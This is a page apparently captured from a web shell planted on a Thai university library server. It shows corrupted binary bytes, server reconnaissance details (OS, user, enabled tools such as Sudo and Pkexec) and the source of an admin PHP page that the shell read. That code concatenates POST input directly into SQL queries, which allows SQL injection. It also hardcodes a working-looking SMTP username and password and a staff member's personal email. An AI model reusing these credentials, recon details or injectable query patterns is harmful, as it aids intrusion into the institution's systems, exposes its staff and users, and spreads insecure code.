403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell

Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /proc/5800/root/var/www/html/sb2/pages/admin/

Upload File :

[ Back ]

Current File : /proc/5800/root/var/www/html/sb2/pages/admin/searchbook_edit_db.php

<?ob_start();?>
<?php include 'check_mode_admin.php';?>
<?php include '../dbconnect.php';?>
<?php include 'header.php';?>

<?php
function MonthThai($strMonth)
{
	$strMonthName = Array("","มกราคม","กุมภาพันธ์","มีนาคม","เมษายน","พฤษภาคม","มิถุนายน","กรกฎาคม","สิงหาคม","กันยายน","ตุลาคม","พฤศจิกายน","ธันวาคม");
	$strMonthThai=$strMonthName[$strMonth];
	return $strMonthThai;
}

if ($_POST["submit"])
{
  $request_number = (isset($_POST["request_number"])) ? $_POST["request_number"] : '';
  $sqlx = "SELECT * FROM request_list WHERE request_number=" . $request_number;
  $queryx = mysqli_query($conn,$sqlx);	
  if($resultx=mysqli_fetch_array($queryx,MYSQLI_ASSOC)) { 	
	$status_id = (isset($_POST["status_id"])) ? $_POST["status_id"] : '';
	$note = (isset($_POST["note"])) ? $_POST["note"] : '';
	$email = $resultx["email"];
	if ($status_id<>"") {
			//บันทึกลงในตาราง request_list
			$sql = "UPDATE request_list ";
			$sql .= "SET status_id=" . $status_id . ",";
			$sql .= "note='" . $note . "' ";
			$sql .= " WHERE request_number=" . $request_number;
			$query = mysqli_query($conn,$sql);
			if($query) {
				//ส่งเมล
				if (!empty($email)) 	{
					$sql2 = "SELECT * FROM status WHERE status_id=" . $status_id;
					$query2 = mysqli_query($conn,$sql2);	
					if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {	
						$status_name = $result2["status_name"];
						$sendmail = $result2["sendmail"];
						if($sendmail==1) {
							require_once('../../../arit/mailer/class.phpmailer.php');
							$mail = new PHPMailer();
							$mail->CharSet = "utf-8";
							$mail->IsHTML(true);
							$mail->IsSMTP();
							$mail->SMTPAuth = true; // enable SMTP authentication
							$mail->SMTPSecure = "ssl"; // sets the prefix to the servier
							$mail->Host = "smtp.gmail.com"; // sets GMAIL as the SMTP server
							$mail->Port = 465; // set the SMTP port for the GMAIL server
							$mail->Username = "circulation@skru.ac.th"; // GMAIL username
							$mail->Password = "cirarit@skru"; // GMAIL password
							$mail->From = "circulation@skru.ac.th"; // "name@yourdomain.com";
							//$mail->AddReplyTo = "support@thaicreate.com"; // Reply
							//$mail->FromName = "สำนักวิทยบริการฯ ม.ราชภัฏสงขลา";  // set from Name
							$mail->FromName = "=?utf-8?B?".base64_encode("สำนักวิทยบริการฯ ม.ราชภัฏสงขลา")."?=";
							//$mail->Subject = "แจ้งสถานะรายการหนังสือที่ท่านแนะนำเข้าห้องสมุด"; 
							$mail->Subject    =  "=?utf-8?B?".base64_encode("แจ้งสถานะบริการค้นหาตัวเล่มหนังสือ")."?=";
							//$mail->Body = "แจ้งสถานะบริการค้นหาตัวเล่มหนังสือ<br/>ID : $request_number<br/>สถานะ : $status_name<br/>URL : <a href=http://arit.skru.ac.th/searchbook/pages/request_list.php>http://arit.skru.ac.th/searchbook/pages/request_list.php</a>";

							$sql = "SELECT request_list.*, faculty.faculty_name, user_type.user_type_name, receive_method.receive_method_name FROM ((request_list INNER JOIN faculty ON request_list.faculty_id=faculty.faculty_id) INNER JOIN user_type ON request_list.user_type_code=user_type.user_type_code) INNER JOIN receive_method ON request_list.receive_method_id=receive_method.receive_method_id WHERE request_list.request_number=" . $request_number;
							$query = mysqli_query($conn,$sql);
							if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {		
								$mailbody = "แจ้งสถานะบริการค้นหาตัวเล่มหนังสือ";
								$mailbody .= "<br/>ID : $request_number";
								$mailbody .= "<br/>ผู้ขอใช้บริการ : ";
								$sql2 = "SELECT prefix_name FROM prefix WHERE prefix_id=" . $result["prefix_id"];
								$query2 = mysqli_query($conn,$sql2);
								if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
									$prefix_name = $result2["prefix_name"];
								} else { //if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
									$prefix_name = "";
								} //if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {			
								$mailbody .= $prefix_name . $result["firstname"] . " " . $result["lastname"];				
								$mailbody .= "<br/>สถานะ : $status_name";
								$mailbody .= "<br/>วิธีการรับหนังสือ : " . $result["receive_method_name"];
								$mailbody .= "<br/>หมายเหตุ : " . $result["note"];
								$mailbody .= "<hr/>รายชื่อหนังสือ";
								$sql2 = "SELECT * FROM request_item WHERE request_number=" . $request_number . " ORDER BY item_number ASC";
								$query2 = mysqli_query($conn,$sql2);	
								$i=1;
								while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
									$mailbody .= "<br/>" . $i . ". " . $result2["title"] . " / " . $result2["author"] . " / " . $result2["callnumber"];
									$i = $i+1;
								} //while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
								$mailbody .= "<hr/>";
								$mailbody .= "ตามที่ท่านได้แจ้งการใช้บริการค้นหาตัวเล่มหนังสือ ขณะนี้เจ้าหน้าที่ได้ค้นหาตัวเล่มหนังสือตามรายการที่ท่านต้องการ และจัดเก็บไว้ให้เรียบร้อยแล้ว";
								if($result["receive_method_id"] == 1) {
									$today = date("Y-m-d");
									$receive_date = date('Y-m-d', strtotime($today. ' + 7 days'));
									$timestamp = strtotime($receive_date);
									$dd = date('j', $timestamp);
									$mm = date('n', $timestamp);
									$yy = date('Y', $timestamp)+543;
									$date_thai = $dd . "  " . MonthThai($mm) . "  " . $yy;	
									$mailbody .= "<br/>กรุณามารับหนังสือด้วยตนเองที่บริการยืม-คืนทรัพยากรสารสนเทศ ชั้น 2 ภายในวันที่ " . $date_thai ;
								} elseif($result["receive_method_id"] == 2) { //if($result["receive_method_id"] == 1) {
									$mailbody .= "<br/>สำนักวิทยบริการฯ กำลังนำส่งหนังสือไปยังคณะ/หน่วยงานของท่าน";
								} //if($result["receive_method_id"] == 1) {
								$mailbody .= "<br/>URL สำหรับตรวจสอบสถานะ : <a href=http://arit.skru.ac.th/searchbook/pages/request_list.php>http://arit.skru.ac.th/searchbook/pages/request_list.php</a>";
								$mail->Body = $mailbody;
							
							}	//if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {				
						
							//$mail->AddAddress("kobsak.na@skru.ac.th", "Mr.Adisorn Boonsong"); // to Address
							$address = $email;
							$mail->AddAddress($address, "sending ");	
						
							//$mail->AddAttachment("thaicreate/myfile.zip");
							//$mail->AddAttachment("thaicreate/myfile2.zip");
						
							$librarian_email = "ratchanee_jee@hotmail.com";
							$librarian_name = "รัชณี จารุธรรม";
							$mail->AddCC($librarian_email, "=?utf-8?B?".base64_encode($librarian_name)."?="); //CC
							//$mail->AddBCC("member@thaicreate.com", "Mr.Member ShotDev"); //CC
						
							$mail->set('X-Priority', '1'); //Priority 1 = High, 3 = Normal, 5 = low
						
							$mail->Send(); 
							//echo "send..."; 						
						} //if($sendmail==1) {
					}		//if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {		
				} else { //if (!empty($email))
					echo "<br>ไม่สามารถส่งเมล์ได้ เนื่องจาก ผู้ใช้ไม่มีอีเมล์";
				}			 //if (!empty($email))
			
?>							
	<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="index.php"><button type="button" class="btn-success">คลิกที่นี่เพื่อดูรายการ</button></a>
<?php				
				//echo "บันทึกข้อมูลแล้ว";
				//$redirect_url = "index.php#" . $room_code;
				//header("location:$redirect_url");
			} else { //if($query) {
				echo "ไม่สามารถบันทึกข้อมูลได้";
			} //if($query) {	

	} else { //if ($status_id<>"") {
?>	
	<BR />กรุณากรอกข้อมูลให้ครบถ้วน
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
	}  //if ($status_id<>"") {
  } else { //if($resultx=mysqli_fetch_array($queryx,MYSQLI_ASSOC))
  	echo "ไม่พบข้อมูล";
  }
} //if ($_POST["submit"])
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit